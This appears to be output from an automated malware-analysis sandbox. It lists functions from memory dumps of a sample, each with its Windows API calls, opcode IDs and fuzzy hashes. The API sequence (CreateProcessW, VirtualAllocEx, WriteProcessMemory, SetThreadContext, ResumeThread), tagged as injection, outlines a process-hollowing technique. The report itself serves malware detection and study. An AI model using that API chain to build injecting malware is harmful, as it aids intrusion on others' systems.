                                                                    Function 06E78C6C, Relevance: 1.6, APIs: 1, Instructions: 146processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 06E7ED0B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID:
                                                                    • API String ID: 963392458-0
                                                                    • Opcode ID: 3402ecb3f2ac764dc84771935e2dc898b195dc84ccdaa9eaa6ab39a349bda11d
                                                                    • Instruction ID: 61ac0f55bc48db97bd8ee2edc25aa28378cd8f508bd2fb2623093d2b94a97f0e
                                                                    • Opcode Fuzzy Hash: 3402ecb3f2ac764dc84771935e2dc898b195dc84ccdaa9eaa6ab39a349bda11d
                                                                    • Instruction Fuzzy Hash: B051F571D00319DFDB64CF95C884BDDBBB6BF88314F1484A9E908A7250DB719A89CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236B0FA, Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0236DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 2ad67398b9f1e8a20d7821a6637ced62dc5136a010dc99a9e5bcfd8f781dbaf9
                                                                    • Instruction ID: 28f2c7b49aec47cfc930f4eae4de9c3c16147b65b8ac9354fdb42c10687a5c2e
                                                                    • Opcode Fuzzy Hash: 2ad67398b9f1e8a20d7821a6637ced62dc5136a010dc99a9e5bcfd8f781dbaf9
                                                                    • Instruction Fuzzy Hash: 8951CFB5D00309DFDB14CF99D884AEEBBB5BF48314F24812AE819AB214D7B49845CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236B0FC, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0236DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: 33632169688a383f2f403e6117d78918646ae609f6b9cd69b8d5324592009251
                                                                    • Instruction ID: 86447d947ca867f8ca0d677f96e4ba624e2961fa55abd5d37cfc567e9c20fb1d
                                                                    • Opcode Fuzzy Hash: 33632169688a383f2f403e6117d78918646ae609f6b9cd69b8d5324592009251
                                                                    • Instruction Fuzzy Hash: 5B51B0B1D0030DDFDB14CF99C884ADEBBB5BF48314F24812AE919AB214D7B49845CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236DC6D, Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0236DD8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: CreateWindow
                                                                    • String ID:
                                                                    • API String ID: 716092398-0
                                                                    • Opcode ID: c05a66ccc7eb937081cfac65d1e79b2b55bbf11566e228128dea22748c8c48bf
                                                                    • Instruction ID: cb5800ff17f9ea9255efc7262caa862ba34e87aa15f6987df4fc118403862426
                                                                    • Opcode Fuzzy Hash: c05a66ccc7eb937081cfac65d1e79b2b55bbf11566e228128dea22748c8c48bf
                                                                    • Instruction Fuzzy Hash: E151C0B5D00309DFDF14DF99D884ADEBBB5BF48314F24812AE819AB214D7B49945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02366D49, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02366D86,?,?,?,?,?), ref: 02366E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 037ec7e1cf4e113a89c3f04e3e376b2650aff1a5786a7bebd66c8bb9cc642af2
                                                                    • Instruction ID: 079b7fd36336a3bf856ede26c52939e6bb95d09cd5d771558271e30862f45679
                                                                    • Opcode Fuzzy Hash: 037ec7e1cf4e113a89c3f04e3e376b2650aff1a5786a7bebd66c8bb9cc642af2
                                                                    • Instruction Fuzzy Hash: C1414B759002589FCF00CF95D844ADEBBF9EF88320F04846AE914A7350D3759914DFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7F278, Relevance: 1.6, APIs: 1, Instructions: 65injectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E7F305
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: 7bf7ef6c95a6124903bbd39026b61cf5fe885e617417209b4d332d4748c63e21
                                                                    • Instruction ID: cf183be4556b3eec7e4e3c48d0ccd255b033e7c2212616041137b811140be346
                                                                    • Opcode Fuzzy Hash: 7bf7ef6c95a6124903bbd39026b61cf5fe885e617417209b4d332d4748c63e21
                                                                    • Instruction Fuzzy Hash: 9D21E3B5900359DFCB10CF9AD889BDEBBF4FB48314F14842AE959A3240D774A944CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02366DB8, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02366D86,?,?,?,?,?), ref: 02366E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: a865906e7c6af1dceb87d1a1d06b450c9452292e77cad19aa5f5f1252979980d
                                                                    • Instruction ID: 7e75f2d4b648a5c1e50e81650eb50e6e7ff92d13ebd1147cbcfc45f87c8aaf5e
                                                                    • Opcode Fuzzy Hash: a865906e7c6af1dceb87d1a1d06b450c9452292e77cad19aa5f5f1252979980d
                                                                    • Instruction Fuzzy Hash: 9421E3B5901208DFDB10CFA9D584AEEBBF8FB48724F14841AE918B7310D378A955CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02365864, Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02366D86,?,?,?,?,?), ref: 02366E47
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 6a961968d361c3c034a82386833d3679e71624e2beaaccb008ff07e5865303ee
                                                                    • Instruction ID: 209cdbcbc8c9bcc72d90813bd04cdaf8051e6fdaf8ffc5cdf8e3cfcd4193dded
                                                                    • Opcode Fuzzy Hash: 6a961968d361c3c034a82386833d3679e71624e2beaaccb008ff07e5865303ee
                                                                    • Instruction Fuzzy Hash: 4F21E5B59002499FDB10CFAAD584AEEBBF8FB48364F14841AE915B3310D379A954CFA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E789C8, Relevance: 1.6, APIs: 1, Instructions: 60memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06E78A43
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 621bbe8a20d6b7290dba8f969c40a4d53da3d74791954d82dfc60669a6eba2f4
                                                                    • Instruction ID: 769ae6eb81522254565e824db670798b87509d2526b414ccf82cff2559dada20
                                                                    • Opcode Fuzzy Hash: 621bbe8a20d6b7290dba8f969c40a4d53da3d74791954d82dfc60669a6eba2f4
                                                                    • Instruction Fuzzy Hash: 2B21D6B59006099FCB50CF9AD488BDEBBF8FB58324F14842AE968A7340D374A545DFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7EFE8, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E7F067
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead
                                                                    • String ID:
                                                                    • API String ID: 1726664587-0
                                                                    • Opcode ID: c59f65272b4b42c9c788446a8b34652592d73fa53c3ca22e9730764100f293f0
                                                                    • Instruction ID: 01ffff75a39f608c2905f684d88f23ceb6e13e053227c3ec2f2114f569ea0efc
                                                                    • Opcode Fuzzy Hash: c59f65272b4b42c9c788446a8b34652592d73fa53c3ca22e9730764100f293f0
                                                                    • Instruction Fuzzy Hash: 5321D0B5900359DFCB10CF9AD884ADEBBF4FB48320F14842AE958A3350D374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7EF28, Relevance: 1.6, APIs: 1, Instructions: 58threadinjectionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetThreadContext.KERNELBASE(?,00000000), ref: 06E7EF9F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ContextThread
                                                                    • String ID:
                                                                    • API String ID: 1591575202-0
                                                                    • Opcode ID: 0906a83638dbc6f13e09606c726cfe1e9734c5c21ae2ba6bbb9f740da8754cd8
                                                                    • Instruction ID: 4383bbad965626e27ffc1dee34628c495d0b16482ca0e421202cb34e69f7429e
                                                                    • Opcode Fuzzy Hash: 0906a83638dbc6f13e09606c726cfe1e9734c5c21ae2ba6bbb9f740da8754cd8
                                                                    • Instruction Fuzzy Hash: AA2108B1D006199FCB14CF9AD4857DEFBF4BB48224F148169E418B3740D778A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E789D0, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06E78A43
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 7eb1d5658d3e1cbb00949761252465366ee96365582dd84701a9ffda5ead2432
                                                                    • Instruction ID: 81dabecbef3bfd81e481fe71c1580c0cfaa85490bc0227ad28128a255686ee05
                                                                    • Opcode Fuzzy Hash: 7eb1d5658d3e1cbb00949761252465366ee96365582dd84701a9ffda5ead2432
                                                                    • Instruction Fuzzy Hash: 3E21E7B59006099FCB50CF9AD484BDEFBF4FB48324F148429E958A7240D374A545CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236AFC0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236BE89,00000800,00000000,00000000), ref: 0236C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: e7a4269aeafe5e39018693f44cf1c934715d06a9a745fbe0bf7416827c435a98
                                                                    • Instruction ID: d97639f336677f845d5c463ed7b05b6142973672b5b847e965d6b1f1635180cd
                                                                    • Opcode Fuzzy Hash: e7a4269aeafe5e39018693f44cf1c934715d06a9a745fbe0bf7416827c435a98
                                                                    • Instruction Fuzzy Hash: 241117B59002098FDB10CF9AD448BEEFBF8FB48314F14882AD559B7600C375A545CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236C028, Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0236BE89,00000800,00000000,00000000), ref: 0236C09A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 9308d4eeb10547ccc7bb1ea6371cd0c4c1de0d4c93983acbb695b12820d455ed
                                                                    • Instruction ID: 2a91c852b0193287322bbe3fef1888603c50f4b86290340c48104d598ea9db21
                                                                    • Opcode Fuzzy Hash: 9308d4eeb10547ccc7bb1ea6371cd0c4c1de0d4c93983acbb695b12820d455ed
                                                                    • Instruction Fuzzy Hash: 291114B6900209CFCB10CF99D4887DEFBF9BB48324F14852AD459A7200C375A545CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236AF68, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,0236BBDB), ref: 0236BE0E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: add4d5356d673860d6a276b6f547619717083e5d824f79e61e4f427c068a1e6c
                                                                    • Instruction ID: 998a06bcd83d57420c28c5e161d13c31001247e6103e94593d917940af74cb1f
                                                                    • Opcode Fuzzy Hash: add4d5356d673860d6a276b6f547619717083e5d824f79e61e4f427c068a1e6c
                                                                    • Instruction Fuzzy Hash: 9D1123B58006498FCB10CF9AD448BEEFBF9EF48228F14842AD919B7600D374A545CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7F0B8, Relevance: 1.5, APIs: 1, Instructions: 48memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E7F123
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: AllocVirtual
                                                                    • String ID:
                                                                    • API String ID: 4275171209-0
                                                                    • Opcode ID: e01733605bce3545f80edfccfee4d16a02cf170bbcb4e8f04d67db09af62db54
                                                                    • Instruction ID: 52b7295eeb897b8b6a16793c9dcf55c3a31fc107f17188b50d6c072cc0afd362
                                                                    • Opcode Fuzzy Hash: e01733605bce3545f80edfccfee4d16a02cf170bbcb4e8f04d67db09af62db54
                                                                    • Instruction Fuzzy Hash: C411E0B5900649DFCB10CF9AD888BDEBBF8FB48324F148429E569A7210D775A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E78D50, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E7F7AD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: MessagePost
                                                                    • String ID:
                                                                    • API String ID: 410705778-0
                                                                    • Opcode ID: 2a72a846ca2af5e4e6b3300fd82ed242466c87877ae81ffda2ef491e58f46712
                                                                    • Instruction ID: 7ca4ef73791d29f1e49d52eef521a00e680f845a1d9a802582f0bd41a5f09687
                                                                    • Opcode Fuzzy Hash: 2a72a846ca2af5e4e6b3300fd82ed242466c87877ae81ffda2ef491e58f46712
                                                                    • Instruction Fuzzy Hash: 7C11F2B58003099FDB50CF99D888BDEBBF8FB48324F14841AE959A7240D3B4A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236B134, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0236DEA8,?,?,?,?), ref: 0236DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 265bc10ce2d29903efd2aa67aafe7d963c459222e36f785893d37d984fe191d3
                                                                    • Instruction ID: cc0aeeef16c55cda84cfd3f7ad22dea0e1026bce1452c110dca6a8f97f1c2a64
                                                                    • Opcode Fuzzy Hash: 265bc10ce2d29903efd2aa67aafe7d963c459222e36f785893d37d984fe191d3
                                                                    • Instruction Fuzzy Hash: F511F5B59007099FDB10CF99D488BEEBBF8EB48324F148459E955B7700D374A944CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236DEB9, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,0236DEA8,?,?,?,?), ref: 0236DF1D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LongWindow
                                                                    • String ID:
                                                                    • API String ID: 1378638983-0
                                                                    • Opcode ID: 5f9093b0eb7e25037673d4a11d569893a344749051d4bf3f7b6336b6acb0bd0f
                                                                    • Instruction ID: ba360b9feb1e8af6d69ea2640e1ccbca88bac016cc5bc2c0dece5e2fba3694b8
                                                                    • Opcode Fuzzy Hash: 5f9093b0eb7e25037673d4a11d569893a344749051d4bf3f7b6336b6acb0bd0f
                                                                    • Instruction Fuzzy Hash: F71115B9900249CFDB10CF99D588BEEBBF8FB48324F14841AE959A7700C374A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7F430, Relevance: 1.5, APIs: 1, Instructions: 43threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID: ResumeThread
                                                                    • String ID:
                                                                    • API String ID: 947044025-0
                                                                    • Opcode ID: bc30e86100e0c1dffb27fcec1d9d21f56afd054dd1229ed17fb8ccd2708e3be0
                                                                    • Instruction ID: 6b58739650c7005231d1f9a02e8d82a4f0cef8e956ac6256395fc2cca7323324
                                                                    • Opcode Fuzzy Hash: bc30e86100e0c1dffb27fcec1d9d21f56afd054dd1229ed17fb8ccd2708e3be0
                                                                    • Instruction Fuzzy Hash: 2F1112B59003198FCB20CF99D588BDEBBF8FB48324F14842AD569A3300D374A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0217D01C, Relevance: .1, Instructions: 72COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293750808.000000000217D000.00000040.00000001.sdmp, Offset: 0217D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4bd32641c4fb71d3bb3a1a1317529a987df6ab9a7b1ea64054c6a1570bf46a15
                                                                    • Instruction ID: 9dec89a353e26ff1693113d1ac6b550ac4d425896a69de222d973d83d8426501
                                                                    • Opcode Fuzzy Hash: 4bd32641c4fb71d3bb3a1a1317529a987df6ab9a7b1ea64054c6a1570bf46a15
                                                                    • Instruction Fuzzy Hash: F221D075544248DFDB14DF24E9C4B26BBB5FF88324F24C9A9E84A4B246C336D847CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0217D006, Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293750808.000000000217D000.00000040.00000001.sdmp, Offset: 0217D000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3f0ba88628c31275e7e39dde864c5301c9f0ad41153e87abd184f98c16ad956a
                                                                    • Instruction ID: 7b7f08728dfd6c0761ce7a5307437536616298d4dc05deb65a99d7d0316337db
                                                                    • Opcode Fuzzy Hash: 3f0ba88628c31275e7e39dde864c5301c9f0ad41153e87abd184f98c16ad956a
                                                                    • Instruction Fuzzy Hash: A021BE754083C48FCB02CF20D990B15BF71EF86214F28C1DAC8488B6A7C33A984ACB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    Function 00075ED2, Relevance: 3.4, Instructions: 3401COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.292479249.0000000000072000.00000002.00020000.sdmp, Offset: 00070000, based on PE: true
                                                                    • Associated: 00000000.00000002.292463241.0000000000070000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.292721622.00000000000EE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2de1291fb781ede51bc0e1a60835af6338c8fa6c43ddefc9a2ac441dcef4139e
                                                                    • Instruction ID: 71b137ec14096652d61d54fde26340aa2d72be81b1dc534de94b1d645eb2ae75
                                                                    • Opcode Fuzzy Hash: 2de1291fb781ede51bc0e1a60835af6338c8fa6c43ddefc9a2ac441dcef4139e
                                                                    • Instruction Fuzzy Hash: 2743034144EBC21FCB0347B82C352E6BFB55E9722834E94C3D8C58F5A3E5052A69E37A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E748D8, Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: zsE$zsE
                                                                    • API String ID: 0-453686895
                                                                    • Opcode ID: c86239ce50881c2ff096e58cc37ff0b8aedea73162a0656db4bec89ff87547e7
                                                                    • Instruction ID: 9341a7c4064ff62d43305781a999690857492800da9b7a3311876edc22614e6d
                                                                    • Opcode Fuzzy Hash: c86239ce50881c2ff096e58cc37ff0b8aedea73162a0656db4bec89ff87547e7
                                                                    • Instruction Fuzzy Hash: BD71CFB4E0520ADFCB44CF99D5809AEFBF2BF88310F14A56AD415AB355D330A982CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E748C9, Relevance: 2.7, Strings: 2, Instructions: 161COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: zsE$zsE
                                                                    • API String ID: 0-453686895
                                                                    • Opcode ID: 4e0046906c02295c1378f7d45882eba3cbcc9d5aae328e2c2d1aff469a927095
                                                                    • Instruction ID: 91275f5cb46f1e5e47772becd849f1b77064af6d2a29809a60d155e77c040493
                                                                    • Opcode Fuzzy Hash: 4e0046906c02295c1378f7d45882eba3cbcc9d5aae328e2c2d1aff469a927095
                                                                    • Instruction Fuzzy Hash: 6661E2B4E0520ADFCB44CF99D5809AEFBF2FF88310F14A566D415AB255D330AA82CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E74F19, Relevance: 2.6, Strings: 2, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JLjH$\xA
                                                                    • API String ID: 0-3391565245
                                                                    • Opcode ID: cdae6971bf97e4cdf969c8b6223bf7278daacbe6c1064be2b08153dc59db8d10
                                                                    • Instruction ID: 88b481ba527508cd52eaa13ff1633dbbf72fd7e6e258876104300f20fe260fa5
                                                                    • Opcode Fuzzy Hash: cdae6971bf97e4cdf969c8b6223bf7278daacbe6c1064be2b08153dc59db8d10
                                                                    • Instruction Fuzzy Hash: DE41E770D1520ADFDB48CFAAC5815EEFBF2EB88300F24E42AD415A7254E7349A52CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E74F28, Relevance: 2.6, Strings: 2, Instructions: 113COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: JLjH$\xA
                                                                    • API String ID: 0-3391565245
                                                                    • Opcode ID: 5ac2a4860a8c3452e828d1fd1f0fabefdc6725a2bec063b13a0d1f79a0d51df9
                                                                    • Instruction ID: 3ad1e04cde26927f273ff1269738c4ccb864e7cbbc8a7456ea92304007047e9e
                                                                    • Opcode Fuzzy Hash: 5ac2a4860a8c3452e828d1fd1f0fabefdc6725a2bec063b13a0d1f79a0d51df9
                                                                    • Instruction Fuzzy Hash: 5C41E770D0420ADFDB48CFAAC5815EEFBF2BB88304F24E42AD415A7254E7349A51CF94
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E7A7E8, Relevance: 1.6, Strings: 1, Instructions: 357COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D0%m
                                                                    • API String ID: 0-3400087780
                                                                    • Opcode ID: ed0a5aab0347539d38662454b2d192a5a6a2e3d79c719968ea9ac72db140a077
                                                                    • Instruction ID: 9e75f1d127a5381d42b4ccf433fabf4de6610043331e42f87cdffeefcfe4aa32
                                                                    • Opcode Fuzzy Hash: ed0a5aab0347539d38662454b2d192a5a6a2e3d79c719968ea9ac72db140a077
                                                                    • Instruction Fuzzy Hash: D9D1C074E0420A8FDB44DFF9D5406EEBBF2AF88314F10A439D515AB344DB359E428B91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 06E755D8, Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.301337088.0000000006E70000.00000040.00000001.sdmp, Offset: 06E70000, based on PE: false
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: S6
                                                                    • API String ID: 0-2440769531
                                                                    • Opcode ID: ff1d34d94be85afdb6b612b9e8605b3f4e4d01299a562f11ac3271427720a7d3
                                                                    • Instruction ID: ad04d42d6143adb2037bdc601115173fbadddb351e3f63f79448693f047efeca
                                                                    • Opcode Fuzzy Hash: ff1d34d94be85afdb6b612b9e8605b3f4e4d01299a562f11ac3271427720a7d3
                                                                    • Instruction Fuzzy Hash: D8111FB1E157149BEB4CCFAB9C4029EFBF3AFC8200F14C47AC408A6269EB3405468F11
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0236C2B0, Relevance: .5, Instructions: 522COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.293969908.0000000002360000.00000040.00000001.sdmp, Offset: 02360000, based on PE: false
                                                                    Similarity
